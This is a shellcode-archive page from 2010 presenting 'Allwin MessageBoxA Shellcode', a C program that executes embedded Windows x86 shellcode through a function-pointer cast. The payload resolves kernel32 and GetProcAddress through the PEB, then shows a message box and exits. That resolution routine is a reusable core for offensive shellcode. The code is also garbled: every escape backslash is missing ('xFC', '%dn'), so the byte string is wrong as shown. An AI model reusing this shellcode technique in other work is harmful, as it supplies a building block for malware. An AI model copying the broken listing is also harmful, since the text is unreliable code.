Allwin MessageBoxA Shellcode

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : Allwin MessageBoxA Shellcode
# Published : 2010-06-11
# Author : RubberDuck
# Previous Title : Solaris/x86 - Sync() & reboot() & exit(0) - 48 bytes
# Next Title : 48 bytes chown root:root /bin/sh x86 linux shellcode

/*
Title: Allwin MessageBoxA Shellcode
Date: 2010-06-11
Author: RubberDuck
Web: http://bflow.security-portal.cz
Tested on: Win 2k, Win 2003, Win XP Home SP2/SP3 CZ/ENG (32), Win Vista (32)/(64), Win 7 (32)/(64), Win 2k8 (32)
Thanks to: kernelhunter, Lodus, Vrtule, Mato, cm3l1k1, eat, st1gd3r and others
*/

#include <stdio.h>
#include <string.h>
#include <stdlib.h>

int main(){
    unsigned char shellcode[]=
    "xFCx33xD2xB2x30x64xFFx32x5Ax8B"
    "x52x0Cx8Bx52x14x8Bx72x28x33xC9"
    "xB1x18x33xFFx33xC0xACx3Cx61x7C"
    "x02x2Cx20xC1xCFx0Dx03xF8xE2xF0"
    "x81xFFx5BxBCx4Ax6Ax8Bx5Ax10x8B"
    "x12x75xDAx8Bx53x3Cx03xD3xFFx72"
    "x34x8Bx52x78x03xD3x8Bx72x20x03"
    "xF3x33xC9x41xADx03xC3x81x38x47"
    "x65x74x50x75xF4x81x78x04x72x6F"
    "x63x41x75xEBx81x78x08x64x64x72"
    "x65x75xE2x49x8Bx72x24x03xF3x66"
    "x8Bx0Cx4Ex8Bx72x1Cx03xF3x8Bx14"
    "x8Ex03xD3x52x33xFFx57x68x61x72"
    "x79x41x68x4Cx69x62x72x68x4Cx6F"
    "x61x64x54x53xFFxD2x68x33x32x01"
    "x01x66x89x7Cx24x02x68x75x73x65"
    "x72x54xFFxD0x68x6Fx78x41x01x8B"
    "xDFx88x5Cx24x03x68x61x67x65x42"
    "x68x4Dx65x73x73x54x50xFFx54x24"
    "x2Cx57x68x4Fx5Fx6Fx21x8BxDCx57"
    "x53x53x57xFFxD0x68x65x73x73x01"
    "x8BxDFx88x5Cx24x03x68x50x72x6F"
    "x63x68x45x78x69x74x54xFFx74x24"
    "x40xFFx54x24x40x57xFFxD0";

    printf("Size = %dn", strlen(shellcode));

    system("PAUSE");

    ((void (*)())shellcode)();

    return 0;
}